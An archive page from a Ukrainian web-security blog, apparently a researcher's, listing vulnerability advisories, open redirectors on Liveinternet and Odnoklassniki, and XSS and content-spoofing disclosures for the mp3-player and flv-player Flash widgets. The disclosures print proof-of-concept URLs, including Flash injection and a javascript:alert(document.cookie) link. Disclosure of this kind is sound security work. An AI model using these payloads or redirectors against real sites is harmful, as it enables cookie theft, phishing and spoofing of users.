Архів для категорії 'Уразливості'

Добірка уразливостей

17:25 23.10.2013

В даній добірці уразливості в веб додатках:

  • Alt-N MDaemon’s WorldClient Disclosure of Authentication Credentials Vulnerability (деталі)
  • Joomseller “Events Booking Pro” and “JSE Event” reflected XSS (деталі)
  • Alt-N MDaemon’s WebAdmin Remote Code Execution Vulnerability (деталі)
  • Multiple Vulnerabilities in BigTree CMS (деталі)
  • Alt-N MDaemon’s WorldClient Username Enumeration Vulnerability (деталі)
  • Apache CloudStack Cross-site scripting (XSS) vulnerability (деталі)
  • EMC Smarts Network Configuration Manager - RCE Vulnerability (деталі)
  • Trustport Webfilter Remote File Access Vulnerability (деталі)
  • EMC Smarts Product - Cross Site Scripting Vulnerability (деталі)
  • PHPFox v3.6.0 (build3) Multiple SQL Injection vulnerabilities (деталі)

Редиректори на популярних сайтах №7

23:52 22.10.2013

Продовжую розповідати вам про редиректори на популярних сайтах. Редиректори - це окремий різновид уразливостей в веб додатках, котрий відноситься до класу Abuse of Functionality. Дані уразливості можуть використовуватися зловмисниками для переадресації на небезпечні та фішинг сайти.

До наведених в попередньому записі, приведу ще декілька прикладів редиректорів на популярних веб сайтах.

Редиректори на популярних сайтах:

Liveinternet.ru (до раніше згаданих редиректорів на Liveinternet.ru):

http://liveinternet.ru/click?websecurity.com.ua

http://li.ru/click?websecurity.com.ua

Odnoklassniki.ru:

Редиректор на Однокласніках

Уразливості на www.odnoklassniki.ru

23:53 12.10.2013

У серпні соціальна мережа “Одноклассники” проводила конкурс на пошук уразливостей “Нация тестирует!” (з виплатою винагород за уразливості). Тоді я вирішив прийняти участь в цьому конкурсі, бо неодноразово знаходив дірки в різних соціальних мережах і в різних проектах Mail.ru (таких як drive.mail.ru, top.mail.ru, gogo.ru, rb.mail.ru і blogs.mail.ru).

Тоді я знайшов чимало різних уразливостей, деякі з яких вислав Однокласникам. Зокрема декілька знайдених 17.08.2013 уразливостей на http://www.odnoklassniki.ru. Для початку - щоб оцінити, як вони сприймають і оплачують дірки. Ось дві з них: Redirector та Information Leakage. На свого листа я отримав “автоматичну” відповідь, що мого листа отримано і все. Жодної відповіді представників компанії та виправлення уразливостей - ці та інші дірки досі не виправлені.

Redirector (URL Redirector Abuse):

odnoklassniki.ru Redirector.html

Information Leakage:

Витік інформації про Java пакети і версію веб сервера.

odnoklassniki.ru Information Leakage.html

Що дуже типово для соціальних мереж. Які забивають на безпеку, не відповідають на листи і не виплачують винагород за уразливості (навіть якщо і заявляють про проведення подібних виплат), а якщо й виправляють повідомленні дірки, то втихаря, без подяки дослідникам безпеки. Як я мав досвід з MySpace, Facebook і Яндекс в попередні роки.

Уразливості в mp3-player

23:53 11.10.2013

12.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в mp3-player. Про що вже повідомив розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

XSS (Strictly social XSS) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Уразливі mp3-player 2.5 та попередні версії.

Уразливості в плагінах для WordPress №119

23:51 10.10.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mukioplayer, Design-Approval-System та Simple Dropbox. Для котрих з’явилися експлоіти. Mukioplayer - це медіа плеєр, Design-Approval-System - це плагін для розгляду дизайнів, Simple Dropbox - це плагін для інтеграції з Dropbox.

  • WordPress Mukioplayer 1.6 SQL Injection (деталі)
  • WordPress Design-Approval-System 3.6 Cross Site Scripting (деталі)
  • WordPress Simple Dropbox 1.8.8 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:22 10.10.2013

В даній добірці уразливості в веб додатках:

  • Polycom - Command Shell Grants System-Level Access (деталі)
  • vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities (деталі)
  • Polycom - Firmware Update Command Injection (деталі)
  • SilverStripe(R) Information Exposure Through Query Strings in GET Request (CWE-598) (деталі)
  • Polycom - H.323 CDR Database SQL Injection (деталі)
  • Joomla core <= 3.1.5 reflected XSS vulnerability (деталі)
  • Polycom - H.323 Format String Vulnerability (деталі)
  • Vulnerabilities in owncloud (деталі)
  • HP XP P9000 Command View Advanced Edition Suite Products, Remote Disclosure of Information (деталі)
  • Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities (деталі)

Уразливості в flv-player

23:58 08.10.2013

03.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в flv-player. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

08.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Уразливі flv-player 3.5 та попередні версії.

Добірка уразливостей

17:28 08.10.2013

В даній добірці уразливості в веб додатках:

  • Varnish 2.1.5 DoS in STV_alloc() while parsing Content-Length header (деталі)
  • Multiple vulnerabilities in phpMyAdmin (деталі)
  • MojoPortal XSS (деталі)
  • Multiple XSS Vulnerabilities in Jahia xCM (деталі)
  • Varnish 2.1.5, 3.0.3 DoS in VRY_Create() while parsing Vary header (деталі)
  • SQL Injection in Cotonti (деталі)
  • vtiger CRM <= 5.4.0 (SOAP Services) Authentication Bypass Vulnerability (деталі)
  • Samsung TV DoS (possible overflow) via SOAPACTION (деталі)
  • vtiger CRM <= 5.4.0 (vtigerolservice.php) PHP Code Injection Vulnerability (деталі)
  • vtiger CRM <= 5.4.0 (SOAP Services) Multiple SQL Injection Vulnerabilities (деталі)

FPD уразливості в WordPress

23:57 27.09.2013

У версії WordPress 3.6 розробники виправили декілька уразливостей. Але про них розробники WP навмисно не повідомили (для применшення офіційної кількості виправлених дірок).

В цьому місяці я дослідив зміни в версії 3.6 движка і виявив Full path disclosure уразливості в адмінці. Про які не згадали в описі релізу WP 3.6, але згадали про них в Codex серед виправлених багів (при тому, що вони іноді згадують про FPD в анонсах релізів). Що типово для розробників WP - ще з 2007 року вони часто приховують виправлені уразливості.

Раніше я вже писав про уразливості в WordPress та Akismet.

Full path disclosure (WASC-13):

В Media Library якщо атачмент не має батька.
В функції parent_dropdown().
В функції wp_new_comment().
В функції mb_internal_encoding().
При обробці метаданих зображень.
В функції get_post_type_archive_feed_link().
В функції WP_Image_Editor::multi_resize().
В функції wp_generate_attachment_metadata().
При видаленні або відновленні елемента, що вже не існує.

Уразливі WordPress 3.5.2 та попередні версії.

Добірка уразливостей

17:29 27.09.2013

В даній добірці уразливості в веб додатках:

  • Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header (деталі)
  • Basic Forum by JM LLC - Multiple Vulnerabilities (деталі)
  • Xymon Systems and Network Monitor - remote file deletion vulnerability (деталі)
  • Cross-Site Scripting (XSS) in Magnolia CMS (деталі)
  • Varnish 2.1.5, 3.0.3 DoS in http_GetHdr() while parsing Vary header (деталі)